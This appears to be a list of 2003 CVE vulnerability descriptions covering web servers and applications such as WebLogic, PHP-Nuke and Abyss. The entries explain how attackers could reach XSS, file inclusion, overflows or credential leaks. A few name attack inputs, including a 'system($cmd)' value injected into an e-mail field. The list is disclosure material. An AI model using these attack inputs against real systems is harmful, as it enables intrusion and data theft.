[CVE-2003-1513] Multiple cross-site scripting (XSS) vulnerabilities in example scripts in Caucho Technology Resin 2.0 through 2.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) env.jsp, (2) form.jsp, (3) session.jsp, (4) the move parameter to tictactoe.jsp, or the (5) name or (6) comment fields to guestbook.jsp.
[CVE-2003-1511] Cross-site scripting (XSS) vulnerability in Bajie Java HTTP Server 0.95 through 0.95zxv4 allows remote attackers to inject arbitrary web script or HTML via (1) the query string to test.txt, (2) the guestName parameter to the custMsg servlet, or (3) the cookiename parameter to the CookieExample servlet.
[CVE-2003-1510] TinyWeb 1.9 allows remote attackers to cause a denial of service (CPU consumption) via a ".%00." in an HTTP GET request to the cgi-bin directory.
[CVE-2003-1509] Real Networks RealOne Enterprise Desktop 6.0.11.774, RealOne Player 2.0, and RealOne Player 6.0.11.818 through RealOne Player 6.0.11.853 allows remote attackers to execute arbitrary script in the local security zone by embedding script in a temp file before the temp file is executed by the default web browser.
[CVE-2003-1505] Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (crash) by creating a web page or HTML e-mail with a textarea in a div element whose scrollbar-base-color is modified by a CSS style, which is then moved.
[CVE-2003-1498] Cross-site scripting (XSS) vulnerability in search.php for WRENSOFT Zoom Search Engine 2.0 Build 1018 and earlier allows remote attackers to inject arbitrary web script or HTML via the zoom_query parameter.
[CVE-2003-1495] Unspecified vulnerability in the non-SSL web agent in various HP Management Agent products allows local users or remote attackers to gain privileges or cause a denial of service via unknown attack vectors.
[CVE-2003-1490] SonicWall Pro running firmware 6.4.0.1 allows remote attackers to cause a denial of service (device reset) via a long HTTP POST to the internal interface, possibly due to a buffer overflow.
[CVE-2003-1486] Phorum 3.4 through 3.4.2 allows remote attackers to obtain the full path of the web server via an incorrect HTTP request to (1) smileys.php, (2) quick_listrss.php, (3) purge.php, (4) news.php, (5) memberlist.php, (6) forum_listrss.php, (7) forum_list_rdf.php, (8) forum_list.php, or (9) move.php, which leaks the information in an error message.
[CVE-2003-1479] Cross-site scripting (XSS) vulnerability in webcamXP 1.02.432 and 1.02.535 allows remote attackers to inject arbitrary web script or HTML via the message field.
[CVE-2003-1478] Konqueror in KDE 3.0.3 allows remote attackers to cause a denial of service (core dump) via a web page that begins with a "xFFxFE" byte sequence and a large number of CRLF sequences, as demonstrated using freeze.htm.
[CVE-2003-1469] The default configuration of ColdFusion MX has the "Enable Robust Exception Information" option selected, which allows remote attackers to obtain the full path of the web server via a direct request to CFIDE/probe.cfm, which leaks the path in an error message.
[CVE-2003-1468] The Web_Links module in PHP-Nuke 6.0 through 6.5 final allows remote attackers to obtain the full web server path via an invalid cid parameter that is non-numeric or null, which leaks the pathname in an error message.
[CVE-2003-1467] Multiple cross-site scripting (XSS) vulnerabilities in (1) login.php, (2) register.php, (3) post.php, and (4) common.php in Phorum before 3.4.3 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2003-1463] Absolute path traversal vulnerability in Alt-N Technologies WebAdmin 2.0.0 through 2.0.2 allows remote attackers with administrator privileges to (1) determine the installation path by reading the contents of the Name parameter in a link, and (2) read arbitrary files via an absolute path in the Name parameter.
[CVE-2003-1453] Cross-site scripting (XSS) vulnerability in the MytextSanitizer function in XOOPS 1.3.5 through 1.3.9 and XOOPS 2.0 through 2.0.1 allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in an IMG tag.
[CVE-2003-1447] IBM WebSphere Advanced Server Edition 4.0.4 uses a weak encryption algorithm (XOR and base64 encoding), which allows local users to decrypt passwords when the configuration file is exported to XML.
[CVE-2003-1442] The web administration page for the Ericsson HM220dp ADSL modem does not require authentication, which could allow remote attackers to gain access from the LAN side.
[CVE-2003-1438] Race condition in BEA WebLogic Server and Express 5.1 through 7.0.0.1, when using in-memory session replication or replicated stateful session beans, causes the same buffer to be provided to two users, which could allow one user to see session data that was intended for another user.
[CVE-2003-1437] BEA WebLogic Express and WebLogic Server 7.0 and 7.0.0.1, stores passwords in plaintext when a keystore is used to store a private key or trust certificate authorities, which allows local users to gain access.
[CVE-2003-1426] Openwebmail in cPanel 5.0, when run using suid Perl, adds the directory in the SCRIPT_FILENAME environment variable to Perl's @INC include array, which allows local users to execute arbitrary code by modifying SCRIPT_FILENAME to reference a directory containing a malicious openwebmail-shared.pl executable.
[CVE-2003-1423] Petitforum stores the liste.txt data file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as e-mail addresses and encrypted passwords.
[CVE-2003-1420] Cross-site scripting (XSS) vulnerability in Opera 6.0 through 7.0 with automatic redirection disabled allows remote attackers to inject arbitrary web script or HTML via the HTTP Location header.
[CVE-2003-1419] Netscape 7.0 allows remote attackers to cause a denial of service (crash) via a web page with an invalid regular expression argument to the JavaScript reformatDate function.
[CVE-2003-1404] DotBr 0.1 stores config.inc with insufficient access control under the web document root, which allows remote attackers to obtain sensitive information such as SQL usernames and passwords.
[CVE-2003-1401] login.php in php-Board 1.0 stores plaintext passwords in $username.txt with insufficient access control under the web document root, which allows remote attackers to obtain sensitive information via a direct request.
[CVE-2003-1400] Cross-site scripting (XSS) vulnerability in the Your_Account module for PHP-Nuke 5.0 through 6.0 allows remote attackers to inject arbitrary web script or HTML via the user_avatar parameter.
[CVE-2003-1394] CoffeeCup Software Password Wizard 4.0 stores sensitive information such as usernames and passwords in a .apw file under the web document root with insufficient access control, which allows remote attackers to obtain that information via a direct request for the file.
[CVE-2003-1385] ipchat.php in Invision Power Board 1.1.1 allows remote attackers to execute arbitrary PHP code, if register_globals is enabled, by modifying the root_path parameter to reference a URL on a remote web server that contains the code.
[CVE-2003-1384] Cross-site scripting (XSS) vulnerability in index.php in PY-Livredor 1.0 allows remote attackers to insert arbitrary web script or HTML via the (1) titre, (2) Votre pseudo, (3) Votre e-mail, or (4) Votre message fields.
[CVE-2003-1383] WEB-ERP 0.1.4 and earlier allows remote attackers to obtain sensitive information via an HTTP request for the logicworks.ini file, which contains the MySQL database username and password.
[CVE-2003-1372] Cross-site scripting (XSS) vulnerability in links.php script in myPHPNuke 1.8.8, and possibly earlier versions, allows remote attackers to inject arbitrary HTML and web script via the (1) ratenum or (2) query parameters.
[CVE-2003-1370] Multiple cross-site scripting (XSS) vulnerabilities in Nuked-Klan 1.2b allow remote attackers to inject arbitrary HTML or web script via (1) the Author field in the Guestbook module, (2) the Titre or Pseudo fields in the Forum module, or (3) "La Tribune Libre" in the Shoutbox module.
[CVE-2003-1364] Aprelium Technologies Abyss Web Server 1.1.2, and possibly other versions before 1.1.4, allows remote attackers to cause a denial of service (crash) via an HTTP GET message with empty (1) Connection or (2) Range fields.
[CVE-2003-1353] Multiple cross-site scripting (XSS) vulnerabilities in Outreach Project Tool (OPT) 0.946b allow remote attackers to inject arbitrary web script or HTML, as demonstrated using the news field.
[CVE-2003-1348] Cross-site scripting (XSS) vulnerability in guestbook.cgi in ftls.org Guestbook 1.1 allows remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) name, or (3) title field.
[CVE-2003-1347] Multiple cross-site scripting (XSS) vulnerabilities in Geeklog 1.3.7 allow remote attackers to inject arbitrary web script or HTML via the (1) cid parameter to comment.php, (2) uid parameter to profiles.php, (3) uid to users.php, and (4) homepage field.
[CVE-2003-1345] Directory traversal vulnerability in s.dll in WebCollection Plus 5.00 allows remote attackers to view arbitrary files in c:\ via a full pathname in the d parameter.
[CVE-2003-1341] The default installation of Trend Micro OfficeScan 3.0 through 3.54 and 5.x allows remote attackers to bypass authentication from cgiChkMasterPasswd.exe and gain access to the web management console via a direct request to cgiMasterPwd.exe.
[CVE-2003-1338] CRLF injection vulnerability in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to inject arbitrary HTTP headers and possibly conduct HTTP Response Splitting attacks via CRLF sequences in the Location header.
[CVE-2003-1337] Heap-based buffer overflow in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
[CVE-2003-1334] Cross-site scripting (XSS) vulnerability in Kai Blankenhorn Bitfolge simple and nice index file (aka snif) before 1.2.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2003-1318] Twilight Webserver 1.3.3.0 allows remote attackers to cause a denial of service (application crash) via a GET request for a long URI, a different vulnerability than CVE-2004-2376.
[CVE-2003-1317] Cross-site scripting (XSS) vulnerability in mod.php in eNdonesia 8.2 allows remote attackers to inject arbitrary web script or HTML via the mod parameter. NOTE: the provenance of this information is unknown.
[CVE-2003-1311] siteminderagent/SmMakeCookie.ccc in Netegrity SiteMinder does not ensure that the TARGET parameter names a valid redirection resource, which allows remote attackers to construct a URL that might trick users into visiting an arbitrary web site referenced by this parameter.
[CVE-2003-1305] Microsoft Internet Explorer allows remote attackers to cause a denial of service (resource consumption) via a Javascript src attribute that recursively loads the current web page.
[CVE-2003-1304] EarlyImpact ProductCart 1.0 through 2.0 stores database/EIPC.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive database information via a direct request.
[CVE-2003-1301] Sun Java Runtime Environment (JRE) 1.x before 1.4.2_11 and 1.5.x before 1.5.0_06, and as used in multiple web browsers, allows remote attackers to cause a denial of service (application crash) via deeply nested object arrays, which are not properly handled by the garbage collector and trigger invalid memory accesses.
[CVE-2003-1297] Easy File Sharing (EFS) Web Server 1.2 stores the (1) option.ini (aka options.ini) file and (2) log directory under the web root with insufficient access control, which allows remote attackers to obtain sensitive information including an SMTP account username and password hash, the server configuration, and server log files.
[CVE-2003-1296] Easy File Sharing (EFS) Web Server 1.2 allows remote authenticated users to cause a denial of service via (1) an "empty symbol" in the Title field or (2) certain data in the Your Message field, possibly a long argument.
[CVE-2003-1294] Xscreensaver before 4.15 creates temporary files insecurely in (1) driver/passwd-kerberos.c, (2) driver/xscreensaver-getimage-video, (3) driver/xscreensaver.kss.in, and the (4) vidwhacker and (5) webcollage screensavers, which allows local users to overwrite arbitrary files via a symlink attack.
[CVE-2003-1293] Multiple cross-site scripting (XSS) vulnerabilities in NukedWeb GuestBookHost allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Email and (3) Message fields when signing the guestbook.
[CVE-2003-1285] Multiple cross-site scripting (XSS) vulnerabilities in Sambar Server before 6.0 beta 6 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) isapi/testisa.dll, (2) testcgi.exe, (3) environ.pl, (4) the query parameter to samples/search.dll, (5) the price parameter to mortgage.pl, (6) the query string in dumpenv.pl, (7) the query string to dumpenv.pl, and (8) the E-Mail field of the guestbook script (book.pl).
[CVE-2003-1282] IBM Net.Data allows remote attackers to obtain sensitive information such as path names, server names and possibly user names and passwords by causing the (1) $(DTW_CURRENT_FILENAME), (2) $(DATABASE), (3) $(LOGIN), (4) $(PASSWORD), and possibly other predefined variables that can be echoed back to the user via a web form.
[CVE-2003-1271] Cross-site scripting vulnerability (XSS) in AN HTTP 1.41e allows remote attackers to execute arbitrary web script or HTML as other users via a URL containing the script.
[CVE-2003-1269] AN HTTP 1.41e allows remote attackers to obtain the root web server path via an HTTP request with a long argument to a script, which leaks the path in an error message.
[CVE-2003-1258] activate.php in versatileBulletinBoard (vBB) 0.9.5 and 0.9.6 allows remote attackers to gain unauthorized administrative access via a URL request with the uid parameter set to the webmaster uid.
[CVE-2003-1256] aff_liste_langue.php in E-theni allows remote attackers to execute arbitrary PHP code by modifying the rep_include parameter to reference a URL on a remote web server that contains para_langue.php.
[CVE-2003-1254] Active PHP Bookmarks (APB) 1.1.01 allows remote attackers to execute arbitrary PHP code via (1) head.php, (2) apb_common.php, or (3) apb_view_class.php by modifying the APB_SETTINGS parameter to reference a URL on a remote web server that contains the code.
[CVE-2003-1252] register.php in S8Forum 3.0 allows remote attackers to execute arbitrary PHP commands by creating a user whose name ends in a .php extension and entering the desired commands into the E-mail field, which creates a web-accessible .php file that can be called by the attacker, as demonstrated using a "system($cmd)" E-mail address with a "any_name.php" username.
[CVE-2003-1251] The (1) menu.inc.php, (2) datasets.php and (3) mass_operations.inc.php (mistakenly referred to as mass_opeations.inc.php) scripts in N/X 2002 allow remote attackers to execute arbitrary PHP code via a c_path that references a URL on a remote web server that contains the code.
[CVE-2003-1250] Efficient Networks 5861 DSL router, when running firmware 5.3.80 configured to block incoming TCP SYN packets, allows remote attackers to cause a denial of service (crash) via a flood of TCP SYN packets to the WAN interface using a port scanner such as nmap.
[CVE-2003-1249] WebIntelligence 2.7.1 uses guessable user session cookies, which allows remote attackers to hijack sessions.
[CVE-2003-1248] H-Sphere WebShell 2.3 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) mode and (2) zipfile parameters in a URL request.
[CVE-2003-1247] Multiple buffer overflows in H-Sphere WebShell 2.3 allow remote attackers to execute arbitrary code via (1) a long URL content type in CGI::readFile, (2) a long path in diskusage, and (3) a long fname in flist.
[CVE-2003-1243] Cross-site scripting vulnerability (XSS) in Sage 1.0 b3 allows remote attackers to insert arbitrary HTML or web script via the mod parameter.
[CVE-2003-1242] Sage 1.0 b3 allows remote attackers to obtain the root web server path via a URL request for a non-existent module, which returns the path in an error message.
[CVE-2003-1241] Cross-site scripting vulnerability (XSS) in (1) admin_index.php, (2) admin_pass.php, (3) admin_modif.php, and (4) admin_suppr.php in MyGuestbook 3.0 allows remote attackers to execute arbitrary PHP code by modifying the location parameter to reference a URL on a remote web server that contains file.php via script injected into the pseudo, email, and message parameters.
[CVE-2003-1237] Cross-site scripting vulnerability (XSS) in WWWBoard 2.0A2.1 and earlier allows remote attackers to inject arbitrary HTML or web script via a message post.
[CVE-2003-1235] BRW WebWeaver 1.03 allows remote attackers to obtain sensitive server environment information via a URL request for testcgi.exe, which lists the values of environment variables and the current working directory.
[CVE-2003-1231] Cross-site scripting (XSS) vulnerability in index.php in ECW-Shop 5.5 allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2003-1229] X509TrustManager in (1) Java Secure Socket Extension (JSSE) in SDK and JRE 1.4.0 through 1.4.0_01, (2) JSSE before 1.0.3, (3) Java Plug-in SDK and JRE 1.3.0 through 1.4.1, and (4) Java Web Start 1.0 through 1.2 incorrectly calls the isClientTrusted method when determining server trust, which results in improper validation of digital certificate and allows remote attackers to (1) falsely authenticate peers for SSL or (2) incorrectly validate signed JAR files.
[CVE-2003-1226] BEA WebLogic Server and Express 7.0 and 7.0.0.1 stores certain secrets concerning password encryption insecurely in config.xml, filerealm.properties, and weblogic-rar.xml, which allows local users to learn those secrets and decrypt passwords.
[CVE-2003-1225] The default CredentialMapper for BEA WebLogic Server and Express 7.0 and 7.0.0.1 stores passwords in cleartext on disk, which allows local users to extract passwords.
[CVE-2003-1224] Weblogic.admin for BEA WebLogic Server and Express 7.0 and 7.0.0.1 displays the JDBCConnectionPoolRuntimeMBean password to the screen in cleartext, which allows attackers to read a user's password by physically observing ("shoulder surfing") the screen.
[CVE-2003-1223] The Node Manager for BEA WebLogic Express and Server 6.1 through 8.1 SP 1 allows remote attackers to cause a denial of service (Node Manager crash) via malformed data to the Node Manager's port, as demonstrated by nmap.
[CVE-2003-1222] BEA Weblogic Express and Server 8.0 through 8.1 SP 1, when using a foreign Java Message Service (JMS) provider, echoes the password for the foreign provider to the console and stores it in cleartext in config.xml, which could allow attackers to obtain the password.
[CVE-2003-1221] BEA WebLogic Express and Server 7.0 through 8.1 SP 1, under certain circumstances when a request to use T3 over SSL (t3s) is made to the insecure T3 port, may use a non-SSL connection for the communication, which could allow attackers to sniff sessions.
[CVE-2003-1220] BEA WebLogic Server proxy plugin for BEA Weblogic Express and Server 6.1 through 8.1 SP 1 allows remote attackers to cause a denial of service (proxy plugin crash) via a malformed URL.
[CVE-2003-1219] Cross-site scripting (XSS) vulnerability in the tep_href_link function in html_output.php for osCommerce before 2.2-MS3 allows remote attackers to inject arbitrary web script or HTML via the osCsid parameter.
[CVE-2003-1213] The default installation of MaxWebPortal 1.30 stores the portal database under the web document root with insecure access control, which allows remote attackers to obtain sensitive information via a direct request to database/db2000.mdb.
[CVE-2003-1212] MaxWebPortal 1.30 allows remote attackers to perform unauthorized actions by modifying hidden form fields, such as the (1) news, (2) lock, or (3) allmem fields in the 'start new topic' HTML page.
[CVE-2003-1211] Cross-site scripting (XSS) vulnerability in search.asp for MaxWebPortal 1.30 and possibly earlier versions allows remote attackers to inject arbitrary web script or HTML via the Search parameter.
[CVE-2003-1202] The checklogin function in omail.pl for omail webmail 0.98.4 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in a (1) password, (2) domainname, or (3) username.
[CVE-2003-1199] Cross-site scripting (XSS) vulnerability in MyProxy 20030629 allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2003-1198] connection.c in Cherokee web server before 0.4.6 allows remote attackers to cause a denial of service via an HTTP POST request without a Content-Length header field.
[CVE-2003-1197] Cross-site scripting (XSS) vulnerability in index.php for Ledscripts.com LedForums Beta 1 allows remote attackers to inject arbitrary web script or HTML via the (1) top_message parameter or (2) topic field of a new thread.
[CVE-2003-1194] Cross-site scripting (XSS) vulnerability in Booby .1 through 0.2.3 allows remote attackers to inject arbitrary web script or HTML via the error message.
[CVE-2003-1192] Stack-based buffer overflow in IA WebMail Server 3.1.0 allows remote attackers to execute arbitrary code via a long GET request.
[CVE-2003-1190] Cross-site scripting (XSS) vulnerability in PHPRecipeBook 1.24 through 2.17 allows remote attackers to inject arbitrary web script or HTML via a recipe.
[CVE-2003-1187] Cross-site scripting (XSS) vulnerability in include.php in PHPKIT 1.6.02 and 1.6.03 allows remote attackers to inject arbitrary web script or HTML via the contact_email parameter.
[CVE-2003-1186] Buffer overflow in TelCondex SimpleWebServer 2.12.30210 Build3285 allows remote attackers to execute arbitrary code via a long HTTP Referer header.
[CVE-2003-1184] Multiple cross-site scripting (XSS) vulnerabilities in ThWboard Beta 2.8 and 2.81 allow remote attackers to inject arbitrary web script or HTML via (1) time in board.php, (2) the profile Homepage-Feld, (3) pictures, and (4) other "Diverse XSS Bugs."
[CVE-2003-1183] The WebCache component in Oracle Files 9.0.3.1.0, 9.0.3.2.0, and 9.0.3.3.0 of Oracle Collaboration Suite Release 1 caches files despite the cacheability rules imposed by Oracle Files, which allows local users to gain access.
[CVE-2003-1182] Cross-site scripting (XSS) vulnerability in MPM Guestbook 1.2 allows remote attackers to inject arbitrary web script or HTML via the lng parameter.
[CVE-2003-1176] post_message_form.asp in Web Wiz Forums 6.34 through 7.5, when quote mode is used, allows remote attackers to read or write to private forums by modifying the FID (forum ID) parameter.
[CVE-2003-1175] Cross-site scripting (XSS) vulnerability in index.php in Sympoll 1.5 allows remote attackers to inject arbitrary web script or HTML via the vo parameter.
[CVE-2003-1165] Buffer overflow in BRS WebWeaver 1.06 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via an HTTP request with a long User-Agent header.
[CVE-2003-1164] Cross-site scripting (XSS) vulnerability in Mldonkey 2.5-4 allows remote attackers to inject arbitrary web script or HTML via the URI, which is injected into the HTML error page.
[CVE-2003-1159] Plug and Play Web Server Proxy 1.0002c allows remote attackers to cause a denial of service (server crash) via an invalid URI in an HTTP GET request to TCP port 8080.
[CVE-2003-1158] Multiple buffer overflows in the FTP service in Plug and Play Web Server 1.0002c allow remote attackers to cause a denial of service (crash) via long (1) dir, (2) ls, (3) delete, (4) mkdir, (5) DELE, (6) RMD, or (7) MKD commands.
[CVE-2003-1157] Cross-site scripting (XSS) vulnerability in login.asp in Citrix MetaFrame XP Server 1.0 allows remote attackers to inject arbitrary web script or HTML via the NFuse_Message parameter.
[CVE-2003-1152] WebTide 7.04 allows remote attackers to list arbitrary directories via an HTTP request for %3f.jsp (encoded "?").
[CVE-2003-1151] Cross-site scripting (XSS) vulnerability in Fastream NETFile Server 6.0.3.588 allows remote attackers to inject arbitrary web script or HTML via the URL, which is displayed on a "404 Not Found" error page.
[CVE-2003-1149] Cross-site scripting (XSS) vulnerability in Symantec Norton Internet Security 2003 6.0.4.34 allows remote attackers to inject arbitrary web script or HTML via a URL to a blocked site, which is displayed on the blocked sites error page.
[CVE-2003-1146] Cross-site scripting (XSS) vulnerability in John Beatty Easy PHP Photo Album 1.0 allows remote attackers to inject arbitrary web script or HTML via the dir parameter.
[CVE-2003-1145] Cross-site scripting (XSS) vulnerability in friendmail.php in OpenAutoClassifieds 1.0 allows remote attackers to inject arbitrary web script or HTML via the listing parameter.
[CVE-2003-1144] Buffer overflow in the log viewing interface in Perception LiteServe 1.25 through 2.2 allows remote attackers to execute arbitrary code via a GET request with a long file name.
[CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
[CVE-2003-1136] Cross-site scripting (XSS) vulnerability in Chi Kien Uong Guestbook 1.51 allows remote attackers to inject arbitrary web script or HTML via (1) HTML in a posted message or (2) Javascript in an onmouseover attribute in an e-mail address or URL.
[CVE-2003-1131] PHP remote file inclusion vulnerability in index.php in KnowledgeBuilder, referred to as KnowledgeBase, allows remote attackers to execute arbitrary PHP code by modifying the page parameter to reference a URL on a remote web server that contains the code.
[CVE-2003-1126] Unknown vulnerability in SunOne/iPlanet Web Server SP3 through SP5 on Windows platforms allows remote attackers to cause a denial of service.
[CVE-2003-1101] Hummingbird CyberDOCS 3.5.1, 3.9, and 4.0 allows remote attackers to obtain the full path of the DM Web Server via invalid login credentials, which reveals the path in an error message.
[CVE-2003-1100] Multiple cross-site scripting (XSS) vulnerabilities in Hummingbird CyberDOCS 3.5.1, 3.9, and 4.0 allow remote attackers to inject arbitrary web script or HTML via certain vectors.
[CVE-2003-1095] BEA WebLogic Server and Express 7.0 and 7.0.0.1, when using "memory" session persistence for web applications, does not clear authentication information when a web application is redeployed, which could allow users of that application to gain access without having to re-authenticate.
[CVE-2003-1094] BEA WebLogic Server and Express version 7.0 SP3 may follow certain code execution paths that result in an incorrect current user, such as in the frequent use of JNDI initial contexts, which could allow remote authenticated users to gain privileges.
[CVE-2003-1093] BEA WebLogic Server 6.1, 7.0 and 7.0.0.1, when routing messages to a JMS target domain that is inaccessible, may leak the user's password when it throws a ResourceAllocationException.
[CVE-2003-1089] index.php for Zorum 3.4 allows remote attackers to determine the full path of the web root via invalid parameter names, which reveals the path in a PHP error message.
[CVE-2003-1088] Cross-site scripting (XSS) vulnerability in index.php for Zorum 3.4 and 3.5 allows remote attackers to inject arbitrary web script or HTML via the method parameter.
[CVE-2003-1086] PHP remote file inclusion vulnerability in pm/lib.inc.php in pMachine Free and pMachine Pro 2.2 and 2.2.1 allows remote attackers to execute arbitrary PHP code by modifying the pm_path parameter to reference a URL on a remote web server that contains the code.
[CVE-2003-1039] Multiple buffer overflows in the mySAP.com architecture for SAP allow remote attackers to execute arbitrary code via a long HTTP Host header to (1) Message Server, (2) Web Dispatcher, or (3) Application Server.
[CVE-2003-1032] Pi3Web web server 2.0.2 Beta 1, when the Directory Index is configured to use the "Name" column and sort using the column title as a hyperlink, allows remote attackers to cause a denial of service (crash) via a malformed URL to the web server, possibly involving a buffer overflow.
[CVE-2003-1031] Cross-site scripting (XSS) vulnerability in register.php for vBulletin 3.0 Beta 2 allows remote attackers to inject arbitrary HTML or web script via optional fields such as (1) "Interests-Hobbies", (2) "Biography", or (3) "Occupation."
[CVE-2003-1017] Macromedia Flash Player before 7,0,19,0 stores a Flash data file in a predictable location that is accessible to web browsers such as Internet Explorer and Opera, which allows remote attackers to read restricted files via vulnerabilities in web browsers whose exploits rely on predictable names.
[CVE-2003-1004] Cisco PIX firewall 6.2.x through 6.2.3, when configured as a VPN Client, allows remote attackers to cause a denial of service (dropped IPSec tunnel connection) via an IKE Phase I negotiation request to the outside interface of the firewall.
[CVE-2003-0996] Unknown "System Security Vulnerability" in Computer Associates (CA) Unicenter Remote Control (URC) 6.0 allows attackers to gain privileges via the help interface.
[CVE-2003-0980] Cross-site scripting (XSS) vulnerability in FreeScripts VisitorBook LE (visitorbook.pl) allows remote attackers to inject arbitrary HTML or web script via (1) the "do" parameter, (2) via the "user" parameter from a host with a malicious reverse DNS name, (3) via quote marks or ampersands in other parameters.
[CVE-2003-0978] Format string vulnerability in gpgkeys_hkp (experimental HKP interface) for the GnuPG (gpg) client 1.2.3 and earlier, and 1.3.3 and earlier, allows remote attackers or a malicious keyserver to cause a denial of service (crash) and possibly execute arbitrary code during key retrieval.
[CVE-2003-0945] The Web Database Manager in web-tools for SAP DB before 7.4.03.30 generates predictable session IDs, which allows remote attackers to conduct unauthorized activities.
[CVE-2003-0944] Buffer overflow in the WAECHO default service in web-tools in SAP DB before 7.4.03.30 allows remote attackers to execute arbitrary code via a URL with a long requestURI.
[CVE-2003-0942] Buffer overflow in Web Agent Administration service in web-tools for SAP DB before 7.4.03.30 allows remote attackers to execute arbitrary code via a long Name parameter to waadmin.wa.
[CVE-2003-0941] web-tools in SAP DB before 7.4.03.30 allows remote attackers to access the Web Agent Administration pages and modify configuration via a direct request to waadmin.wa.
[CVE-2003-0940] Directory traversal vulnerability in sqlfopenc for web-tools in SAP DB before 7.4.03.30 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a URL.
[CVE-2003-0936] Symantec PCAnywhere 10.x and 11, when started as a service, allows attackers to gain SYSTEM privileges via the help interface using AWHOST32.exe.
[CVE-2003-0910] The NtSetLdtEntries function in the programming interface for the Local Descriptor Table (LDT) in Windows NT 4.0 and Windows 2000 allows local attackers to gain access to kernel memory and execute arbitrary code via an expand-down data segment descriptor that points to protected memory.
[CVE-2003-0904] Microsoft Exchange 2003 and Outlook Web Access (OWA), when configured to use NTLM authentication, does not properly reuse HTTP connections, which can cause OWA users to view mailboxes of other users when Kerberos has been disabled as an authentication method for IIS 6.0, e.g. when SharePoint Services 2.0 is installed.
[CVE-2003-0859] The getifaddrs function in GNU libc (glibc) 2.2.4 and earlier allows local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface.
[CVE-2003-0858] Zebra 0.93b and earlier, and quagga before 0.95, allows local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface.
[CVE-2003-0857] The (1) ipq_read and (2) ipulog_read functions in iptables allow local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface.
[CVE-2003-0856] iproute 2.4.7 and earlier allows local users to cause a denial of service via spoofed messages as other users to the kernel netlink interface.
[CVE-2003-0841] The grid option in PeopleSoft 8.42 stores temporary .xls files in guessable directories under the web document root, which allows remote attackers to steal search results by directly accessing the files via a URL request.
[CVE-2003-0833] Stack-based buffer overflow in webfs before 1.20 allows attackers to execute arbitrary code by creating directories that result in a long pathname.
[CVE-2003-0832] Directory traversal vulnerability in webfs before 1.20 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a Hostname header.
[CVE-2003-0809] Internet Explorer 5.01 through 6.0 does not properly handle object tags returned from a Web server during XML data binding, which allows remote attackers to execute arbitrary code via an HTML e-mail message or web page.
[CVE-2003-0802] Nokia Electronic Documentation (NED) 5.0 allows remote attackers to obtain a directory listing of the WebLogic web root, and the physical path of the NED server, via a "retrieve" action with a location parameter of . (dot).
[CVE-2003-0801] Cross-site scripting (XSS) vulnerability in Nokia Electronic Documentation (NED) 5.0 allows remote attackers to execute arbitrary web script and steal cookies via a URL to the docs/ directory that contains the script.
[CVE-2003-0785] ipmasq before 3.5.12, in certain configurations, may forward packets to the external interface even if the packets are not associated with an established connection, which could allow remote attackers to bypass intended filtering.
[CVE-2003-0769] Cross-site scripting (XSS) vulnerability in the ICQ Web Front guestbook (guestbook.html) allows remote attackers to insert arbitrary web script and HTML via the message field.
[CVE-2003-0762] Buffer overflow in (1) foxweb.dll and (2) foxweb.exe of Foxweb 2.5 allows remote attackers to execute arbitrary code via a long URL (PATH_INFO value).
[CVE-2003-0757] Check Point FireWall-1 4.0 and 4.1 before SP5 allows remote attackers to obtain the IP addresses of internal interfaces via certain SecuRemote requests to TCP ports 256 or 264, which leaks the IP addresses in a reply packet.
[CVE-2003-0749] Cross-site scripting (XSS) vulnerability in wgate.dll for SAP Internet Transaction Server (ITS) 4620.2.0.323011 allows remote attackers to insert arbitrary web script and steal cookies via the ~service parameter.
[CVE-2003-0738] The calendar module in phpWebSite 0.9.x and earlier allows remote attackers to cause a denial of service (crash) via a long year parameter.
[CVE-2003-0737] The calendar module in phpWebSite 0.9.x and earlier allows remote attackers to obtain the full pathname of phpWebSite via an invalid year, which generates an error from localtime() in TimeZone.php of the Pear library.
[CVE-2003-0736] Multiple cross-site scripting (XSS) vulnerabilities in phpWebSite 0.9.x and earlier allow remote attackers to execute arbitrary web script via (1) the day parameter in the calendar module, (2) the fatcat_id parameter in the fatcat module, (3) the PAGE_id parameter in the pagemaster module, (4) the PDA_limit parameter in the search, and (5) possibly other parameters in the calendar, fatcat, and pagemaster modules.
[CVE-2003-0735] SQL injection vulnerability in the Calendar module of phpWebSite 0.9.x and earlier allows remote attackers to execute arbitrary SQL queries, as demonstrated using the year parameter.
[CVE-2003-0733] Multiple cross-site scripting (XSS) vulnerabilities in WebLogic Integration 7.0 and 2.0, Liquid Data 1.1, and WebLogic Server and Express 5.1 through 7.0, allow remote attackers to execute arbitrary web script and steal authentication credentials via (1) a forward instruction to the Servlet container or (2) other vulnerabilities in the WebLogic Server console application.
[CVE-2003-0728] Horde before 2.2.4 allows remote malicious web sites to steal session IDs and read or create arbitrary email by stealing the ID from a referrer URL.
[CVE-2003-0718] The WebDAV Message Handler for Internet Information Services (IIS) 5.0, 5.1, and 6.0 allows remote attackers to cause a denial of service (memory and CPU exhaustion, application crash) via a PROPFIND request with an XML message containing XML elements with a large number of attributes.
